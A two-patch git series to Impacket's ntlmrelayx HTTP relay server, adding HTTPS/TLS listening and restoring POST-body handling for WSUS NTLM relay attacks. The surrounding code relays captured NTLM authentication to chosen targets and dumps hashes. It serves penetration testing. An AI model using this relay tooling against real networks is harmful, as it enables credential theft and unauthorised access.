From 570d173747037b8c74176f93a75d0662ee92f714 Mon Sep 17 00:00:00 2001
From: Coontzy1 <coontz.austin@gmail.com>
Date: Wed, 3 Sep 2025 22:52:26 -0400
Subject: [PATCH 1/2] httpRelayServer: restore POST body handling and add
 HTTPS/TLS support

This commit makes two improvements to httprelayserver.py:

1. Restore POST body draining logic (#913):
   - Re-applies fix originally merged in 2021 by Rcarnus.
   - Ensures POST request bodies are consumed before returning 401 Unauthorized.
   - Fixes WSUS and other web clients that retry authentication on the same TCP stream.

2. Add HTTPS/TLS support with improved logging:
   - Introduce optional SSL context when --https, --certfile, and --keyfile are provided.
   - Wrap inbound sockets with TLS, logging negotiated protocol/cipher on success.
   - On failures, log SSL error details, flagging early EOFs (likely client cert rejection).
   - Add startup banner showing port, IPv6/HTTPS status for clarity.

Together these changes allow ntlmrelayx to:
- Correctly handle WSUS POST-based authentication flows.
- Relay over HTTPS endpoints (e.g., WSUS 8531) with real certs or self-signed.
- Provide more useful debug information for operators.
---
 examples/ntlmrelayx.py                        |  11 ++
 .../ntlmrelayx/servers/httprelayserver.py     | 181 +++++++++++++-----
 2 files changed, 140 insertions(+), 52 deletions(-)

diff --git a/examples/ntlmrelayx.py b/examples/ntlmrelayx.py
index 66524aa528..4eabe52b49 100644
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -219,6 +219,11 @@ def start_servers(options, threads):
         
         c.setAltName(options.altname)
 
+        #https optioons
+        c.https = options.https
+        c.certfile = options.certfile
+        c.keyfile = options.keyfile
+
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
         if server is HTTPRelayServer and options.r is not None:
             c.setMode('REDIRECT')
@@ -371,6 +376,12 @@ def stop_servers(threads):
     httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
     httpoptions.add_argument('-remove-target', action='store_true', default=False,
                             help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
+    httpoptions.add_argument('--https', action='store_true',
+                            help='Enable TLS (HTTPS) on the HTTP relay server')
+    httpoptions.add_argument('--certfile', action='store', metavar='FILE',
+                            help='Path to server certificate (PEM format) for HTTPS')
+    httpoptions.add_argument('--keyfile', action='store', metavar='FILE',
+                            help='Path to private key (PEM format) for HTTPS')
 
     #LDAP options
     ldapoptions = parser.add_argument_group("LDAP client options")
diff --git a/impacket/examples/ntlmrelayx/servers/httprelayserver.py b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
index 018d935ff6..c9dfb32c6d 100644
--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -1,6 +1,6 @@
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# Copyright Fortra, LLC and its affiliated companies 
+# Copyright Fortra, LLC and its affiliated companies
 #
 # All rights reserved.
 #
@@ -23,6 +23,7 @@
 import socket
 import base64
 import random
+import ssl
 import struct
 import string
 from threading import Thread
@@ -44,10 +45,59 @@ def __init__(self, server_address, RequestHandlerClass, config):
                 self.address_family = socket.AF_INET6
             # Tracks the number of times authentication was prompted for WPAD per client
             self.wpad_counters = {}
-            socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
+
+            socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
+
+            # Startup banner with port + HTTPS flag
+            try:
+                LOG.info("HTTPD(%s): Listening on %s:%s (IPv6=%s, HTTPS=%s)" % (
+                    self.server_address[1],
+                    self.server_address[0],
+                    self.server_address[1],
+                    self.config.ipv6,
+                    getattr(self.config, "https", False)
+                ))
+            except Exception:
+                # Fail-safe in case server_address isn't fully populated yet
+                LOG.info("HTTPD(?): Listening (IPv6=%s, HTTPS=%s)" % (
+                    self.config.ipv6,
+                    getattr(self.config, "https", False)
+                ))
+
+            # If HTTPS is enabled, prepare SSL context
+            if getattr(self.config, "https", False):
+                self.context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+                self.context.load_cert_chain(
+                    certfile=getattr(self.config, "certfile", None),
+                    keyfile=getattr(self.config, "keyfile", None)
+                )
+        def get_request(self):
+            sock, addr = socketserver.TCPServer.get_request(self)
+            if getattr(self.config, "https", False):
+                try:
+                    ssock = self.context.wrap_socket(sock, server_side=True)
+                    LOG.debug("HTTPD(%s): TLS handshake from %s:%s succeeded (protocol=%s, cipher=%s)",
+                              self.server_address[1], addr[0], addr[1],
+                              ssock.version(), ssock.cipher())
+                    return ssock, addr
+                except ssl.SSLError as e:
+                    if "EOF" in str(e):
+                        LOG.warning("HTTPD(%s): TLS handshake from %s:%s aborted early (likely client rejected cert)",
+                                    self.server_address[1], addr[0], addr[1])
+                    else:
+                        LOG.error("HTTPD(%s): TLS handshake from %s:%s failed: %s",
+                                  self.server_address[1], addr[0], addr[1], e)
+                    sock.close()
+                    raise
+                except Exception as e:
+                    LOG.error("HTTPD(%s): TLS handshake from %s:%s failed (generic error: %s)",
+                              self.server_address[1], addr[0], addr[1], e)
+                    sock.close()
+                    raise
+            return sock, addr
 
     class HTTPHandler(http.server.SimpleHTTPRequestHandler):
-        def __init__(self,request, client_address, server):
+        def __init__(self, request, client_address, server):
             self.server = server
             self.protocol_version = 'HTTP/1.1'
             self.challengeMessage = None
@@ -66,10 +116,10 @@ def __init__(self,request, client_address, server):
                     # Reflection mode, defaults to SMB at the target, for now
                     self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0])
             try:
-                http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
+                http.server.SimpleHTTPRequestHandler.__init__(self, request, client_address, server)
             except Exception as e:
-                LOG.debug("(HTTP): Exception:", exc_info=True)
-                LOG.error("(HTTP): %s" % str(e))
+                LOG.debug("HTTPD(%s): Exception:", self.server.server_address[1], exc_info=True)
+                LOG.error("HTTPD(%s): %s" % (self.server.server_address[1], str(e)))
 
         def handle_one_request(self):
             try:
@@ -77,16 +127,16 @@ def handle_one_request(self):
             except KeyboardInterrupt:
                 raise
             except Exception as e:
-                LOG.debug("(HTTP): Exception:", exc_info=True)
-                LOG.error('(HTTP): Exception in HTTP request handler: %s' % e)
+                LOG.debug("HTTPD(%s): Exception:", self.server.server_address[1], exc_info=True)
+                LOG.error('HTTPD(%s): Exception in HTTP request handler: %s' % (self.server.server_address[1], e))
 
         def log_message(self, format, *args):
             return
 
         def send_error(self, code, message=None):
-            if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
+            if message and (message.find('RPC_OUT') >= 0 or message.find('RPC_IN') >= 0):
                 return self.do_GET()
-            return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
+            return http.server.SimpleHTTPRequestHandler.send_error(self, code, message)
 
         def send_not_found(self):
             self.send_response(404)
@@ -108,7 +158,7 @@ def serve_wpad(self):
             wpadResponse = self.wpad % (self.server.config.wpad_host, self.server.config.wpad_host)
             self.send_response(200)
             self.send_header('Content-type', 'application/x-ns-proxy-autoconfig')
-            self.send_header('Content-Length',len(wpadResponse))
+            self.send_header('Content-Length', len(wpadResponse))
             self.end_headers()
             self.wfile.write(b(wpadResponse))
             return
@@ -148,7 +198,7 @@ def strip_blob(self, proxy):
                     autorizationHeader = self.headers.get('Authorization')
 
             if (proxy and proxyAuthHeader is None) or (not proxy and autorizationHeader is None):
-                self.do_AUTHHEAD(message = b'NTLM',proxy=proxy)
+                self.do_AUTHHEAD(message=b'NTLM', proxy=proxy)
                 messageType = 0
                 token = None
             else:
@@ -160,10 +210,10 @@ def strip_blob(self, proxy):
                     _, blob = typeX.split('NTLM')
                     token = base64.b64decode(blob.strip())
                 except Exception:
-                    LOG.debug("(HTTP): Exception:", exc_info=True)
-                    self.do_AUTHHEAD(message = b'NTLM', proxy=proxy)
+                    LOG.debug("HTTPD(%s): Exception:", self.server.server_address[1], exc_info=True)
+                    self.do_AUTHHEAD(message=b'NTLM', proxy=proxy)
                 else:
-                    messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+                    messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
 
             return token, messageType
 
@@ -183,7 +233,7 @@ def do_OPTIONS(self):
 
         def do_PROPFIND(self):
 
-            LOG.info('(HTTP): Client requested path: %s' % self.path.lower())
+            LOG.info('HTTPD(%s): Client requested path: %s' % (self.server.server_address[1], self.path.lower()))
 
             proxy = False
             if (".jpg" in self.path) or (".JPG" in self.path):
@@ -201,7 +251,7 @@ def do_PROPFIND(self):
                 # We can start the relay process
                 self.do_relay(messageType, token, proxy, content)
 
-        def do_AUTHHEAD(self, message = b'', proxy=False):
+        def do_AUTHHEAD(self, message=b'', proxy=False):
             if proxy:
                 self.send_response(407)
                 self.send_header('Proxy-Authenticate', message.decode('utf-8'))
@@ -209,11 +259,11 @@ def do_AUTHHEAD(self, message = b'', proxy=False):
                 self.send_response(401)
                 self.send_header('WWW-Authenticate', message.decode('utf-8'))
             self.send_header('Content-type', 'text/html')
-            self.send_header('Content-Length','0')
+            self.send_header('Content-Length', '0')
             self.send_header('Connection', 'keep-alive')
             self.end_headers()
 
-        #Trickery to relay the victim to all the targets we want
+        # Trickery to relay the victim to all the targets we want
         def do_REDIRECT(self, proxy=False):
             rstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
             self.send_response(307)
@@ -222,17 +272,17 @@ def do_REDIRECT(self, proxy=False):
             else:
                 self.send_header('WWW-Authenticate', 'NTLM')
             self.send_header('Content-type', 'text/html')
-            self.send_header('Connection','keep-alive')
-            self.send_header('Location','/%s' % rstr)
-            self.send_header('Content-Length','0')
+            self.send_header('Connection', 'keep-alive')
+            self.send_header('Location', '/%s' % rstr)
+            self.send_header('Content-Length', '0')
             self.end_headers()
 
         def do_SMBREDIRECT(self):
             self.send_response(302)
             self.send_header('Content-type', 'text/html')
-            self.send_header('Location','file://%s' % self.server.config.redirecthost)
-            self.send_header('Content-Length','0')
-            self.send_header('Connection','close')
+            self.send_header('Location', 'file://%s' % self.server.config.redirecthost)
+            self.send_header('Content-Length', '0')
+            self.send_header('Connection', 'close')
             self.end_headers()
 
         def do_POST(self):
@@ -248,18 +298,30 @@ def do_CONNECT(self):
             return
 
         def do_GET(self):
+
+            if PY2:
+                contentLength = self.headers.getheader("Content-Length")
+            else:
+                contentLength = self.headers.get("Content-Length")
+            if contentLength is not None:
+                try:
+                    # Drain request body if present (prevents client stalls)
+                    _ = self.rfile.read(int(contentLength))
+                except Exception:
+                    pass
+
             if self.server.config.mode == 'REDIRECT':
                 self.do_SMBREDIRECT()
                 return
 
-            LOG.info('(HTTP): Client requested path: %s' % self.path.lower())
+            LOG.info('HTTPD(%s): Client requested path: %s' % (self.server.server_address[1], self.path.lower()))
 
             # Serve WPAD if:
             # - The client requests it
             # - A WPAD host was provided in the command line options
             # - The client has not exceeded the wpad_auth_num threshold yet
             if self.path.lower() == '/wpad.dat' and self.server.config.serve_wpad and self.should_serve_wpad(self.client_address[0]):
-                LOG.info('(HTTP): Serving PAC file to client %s' % self.client_address[0])
+                LOG.info('HTTPD(%s): Serving PAC file to client %s' % (self.server.server_address[1], self.client_address[0]))
                 self.serve_wpad()
                 return
 
@@ -301,14 +363,14 @@ def do_ntlm_negotiate(self, token, proxy):
                 if self.challengeMessage is False:
                     return False
             else:
-                LOG.error('(HTTP): Protocol Client for %s not found!' % self.target.scheme.upper())
+                LOG.error('HTTPD(%s): Protocol Client for %s not found!' % (self.server.server_address[1], self.target.scheme.upper()))
                 return False
 
             # Calculate auth
-            self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(self.challengeMessage.getData()), proxy=proxy)
+            self.do_AUTHHEAD(message=b'NTLM ' + base64.b64encode(self.challengeMessage.getData()), proxy=proxy)
             return True
 
-        def do_ntlm_auth(self,token,authenticateMessage):
+        def do_ntlm_auth(self, token, authenticateMessage):
             if authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1':
                 clientResponse, errorCode = self.client.sendAuth(token)
             else:
@@ -354,7 +416,7 @@ def do_local_auth(self, messageType, token, proxy):
                 challengeMessage['Version'] = b'\xff' * 8
                 challengeMessage['VersionLen'] = 8
 
-                self.do_AUTHHEAD(message=b'NTLM ' + base64.b64encode(challengeMessage.getData()),proxy=proxy)
+                self.do_AUTHHEAD(message=b'NTLM ' + base64.b64encode(challengeMessage.getData()), proxy=proxy)
                 return
 
             elif messageType == 3:
@@ -362,22 +424,24 @@ def do_local_auth(self, messageType, token, proxy):
                 authenticateMessage.fromString(token)
                 self.authUser = authenticateMessage.getUserString()
 
-                self.target = self.server.config.target.getTarget(identity = self.authUser)
+                self.target = self.server.config.target.getTarget(identity=self.authUser)
                 if self.target is None:
                     if self.server.config.keepRelaying:
                         self.server.config.target.reloadTargets(full_reload=True)
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
                     else:
-                        LOG.info("(HTTP): Connection from %s@%s controlled, but there are no more targets left!" % (self.authUser, self.client_address[0]))
+                        LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
+                            self.server.server_address[1], self.authUser, self.client_address[0]))
                         self.send_not_found()
                         return
 
-                LOG.info("(HTTP): Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (
+                    self.server.server_address[1], self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
 
                 self.relayToHost = True
                 self.do_REDIRECT()
 
-        def do_relay(self, messageType, token, proxy, content = None):
+        def do_relay(self, messageType, token, proxy, content=None):
             if messageType == 1:
                 if self.server.config.disableMulti:
                     self.target = self.server.config.target.getTarget(multiRelay=False)
@@ -386,27 +450,32 @@ def do_relay(self, messageType, token, proxy, content = None):
                             self.server.config.target.reloadTargets(full_reload=True)
                             self.target = self.server.config.target.getTarget(multiRelay=False)
                         else:
-                            LOG.info("(HTTP): Connection from %s controlled, but there are no more targets left!" % self.client_address[0])
+                            LOG.info("HTTPD(%s): Connection from %s controlled, but there are no more targets left!" % (
+                                self.server.server_address[1], self.client_address[0]))
                             self.send_not_found()
                             return
 
-                    LOG.info("(HTTP): Connection from %s controlled, attacking target %s://%s" % (self.client_address[0], self.target.scheme, self.target.netloc))
+                    LOG.info("HTTPD(%s): Connection from %s controlled, attacking target %s://%s" % (
+                        self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
 
                 try:
                     ntlm_negotiate_response = self.do_ntlm_negotiate(token, proxy=proxy)
                 except Exception as e:
-                    LOG.error('(HTTP): Exception while Negotiating NTLM with %s://%s: "%s"' % (self.target.scheme, self.target.netloc, str(e)))
+                    LOG.error('HTTPD(%s): Exception while Negotiating NTLM with %s://%s: "%s"' % (
+                        self.server.server_address[1], self.target.scheme, self.target.netloc, str(e)))
                     ntlm_negotiate_response = False
 
                 if not ntlm_negotiate_response:
                     # Connection failed
                     if self.server.config.disableMulti:
-                        LOG.error('(HTTP): Negotiating NTLM with %s://%s failed' % (self.target.scheme, self.target.netloc))
+                        LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed' % (
+                            self.server.server_address[1], self.target.scheme, self.target.netloc))
                         self.server.config.target.registerTarget(self.target)
                         self.send_not_found()
                         return
                     else:
-                        LOG.error('(HTTP): Negotiating NTLM with %s://%s failed. Skipping to next target' % (self.target.scheme, self.target.netloc))
+                        LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
+                            self.server.server_address[1], self.target.scheme, self.target.netloc))
 
                         self.server.config.target.registerTarget(self.target, gotUsername=self.authUser)
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
@@ -416,11 +485,13 @@ def do_relay(self, messageType, token, proxy, content = None):
                                 self.server.config.target.reloadTargets(full_reload=True)
                                 self.target = self.server.config.target.getTarget(identity=self.authUser)
                             else:
-                                LOG.info("(HTTP): Connection from %s@%s controlled, but there are no more targets left!" % (self.authUser, self.client_address[0]))
+                                LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
+                                    self.server.server_address[1], self.authUser, self.client_address[0]))
                                 self.send_not_found()
                                 return
 
-                        LOG.info("(HTTP): Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                        LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (
+                            self.server.server_address[1], self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
 
                         self.do_REDIRECT()
 
@@ -433,7 +504,8 @@ def do_relay(self, messageType, token, proxy, content = None):
                     target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
 
                 if not self.do_ntlm_auth(token, authenticateMessage):
-                    LOG.error("(HTTP): Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
+                    LOG.error("HTTPD(%s): Authenticating against %s://%s as %s FAILED" % (
+                        self.server.server_address[1], self.target.scheme, self.target.netloc, self.authUser))
                     if self.server.config.disableMulti:
                         self.send_not_found()
                         return
@@ -449,14 +521,16 @@ def do_relay(self, messageType, token, proxy, content = None):
                                 self.server.config.target.reloadTargets(full_reload=True)
                                 self.target = self.server.config.target.getTarget(identity=self.authUser)
                             else:
-                                LOG.info("(HTTP): Connection from %s@%s controlled, but there are no more targets left!" % (self.authUser, self.client_address[0]))
+                                LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                                         (self.server.server_address[1], self.authUser, self.client_address[0]))
                                 self.send_not_found()
                                 return
 
                         self.send_not_found()  # Stop relaying at first login fail, this matches the behavior of smbrelayserver
 
                         # Uncomment lines below to keep relaying after login failures
-                        # LOG.info("(HTTP): Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                        # LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                        #     self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
 
                         # self.do_REDIRECT()
                     else:
@@ -464,7 +538,8 @@ def do_relay(self, messageType, token, proxy, content = None):
                         self.do_AUTHHEAD(b'NTLM', proxy=proxy)
                 else:
                     # Relay worked, do whatever we want here...
-                    LOG.info("(HTTP): Authenticating connection from %s@%s against %s://%s SUCCEED" % (self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                    LOG.info("HTTPD(%s): Authenticating connection from %s@%s against %s://%s SUCCEED" % (
+                        self.server.server_address[1], self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
 
                     ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
                                                         authenticateMessage['user_name'],
@@ -473,7 +548,7 @@ def do_relay(self, messageType, token, proxy, content = None):
                     self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
 
                     if self.server.config.dumpHashes is True:
-                        LOG.info("(HTTP): %s" % ntlm_hash_data['hash_string'])
+                        LOG.info("HTTPD(%s): %s" % (self.server.server_address[1], ntlm_hash_data['hash_string']))
 
                     if self.server.config.outputFile is not None:
                         writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
@@ -499,7 +574,8 @@ def do_relay(self, messageType, token, proxy, content = None):
                                 self.server.config.target.reloadTargets(full_reload=True)
                                 self.target = self.server.config.target.getTarget(identity=self.authUser)
                             else:
-                                LOG.info("(HTTP): Connection from %s@%s controlled, but there are no more targets left!" % (self.authUser, self.client_address[0]))
+                                LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
+                                    self.server.server_address[1], self.authUser, self.client_address[0]))
                                 # Return Multi-Status status code to WebDAV servers
                                 if self.command == "PROPFIND":
                                     self.send_multi_status(content)
@@ -515,7 +591,8 @@ def do_relay(self, messageType, token, proxy, content = None):
                                 return
 
                         # We have the next target, let's keep relaying...
-                        LOG.info("(HTTP): Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                        LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (
+                            self.server.server_address[1], self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
                         self.do_REDIRECT()
 
         def do_attack(self):
@@ -533,7 +610,7 @@ def do_attack(self):
                                                                                self.authUser)
                 clientThread.start()
             else:
-                LOG.error('(HTTP): No attack configured for %s' % self.target.scheme.upper())
+                LOG.error('HTTPD(%s): No attack configured for %s' % (self.server.server_address[1], self.target.scheme.upper()))
 
     def __init__(self, config):
         Thread.__init__(self)
@@ -552,8 +629,8 @@ def run(self):
         self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
 
         try:
-             self.server.serve_forever()
+            self.server.serve_forever()
         except KeyboardInterrupt:
-             pass
+            pass
         LOG.info('Shutting down HTTP Server')
         self.server.server_close()

From 458c6949557bb68d9b102bf0329fc70ca6437600 Mon Sep 17 00:00:00 2001
From: Coontzy1 <coontz.austin@gmail.com>
Date: Fri, 5 Sep 2025 23:36:30 -0400
Subject: [PATCH 2/2] Added comment explaining part of code

---
 impacket/examples/ntlmrelayx/servers/httprelayserver.py | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/impacket/examples/ntlmrelayx/servers/httprelayserver.py b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
index c9dfb32c6d..8ac63bb0ee 100644
--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -186,6 +186,11 @@ def serve_image(self):
                 self.wfile.write(imgFile_data)
 
         def strip_blob(self, proxy):
+            # Get the body of the request if any
+            # Otherwise, successive requests will not beb handled properly
+            # Was added in July 29, 2020 branch e59ff69 and removed during
+            # restructuring March 30, 2022 branch a168273. Needed for 
+            # relaying the request during WSUS relay attacks
             if PY2:
                 if proxy:
                     proxyAuthHeader = self.headers.getheader('Proxy-Authorization')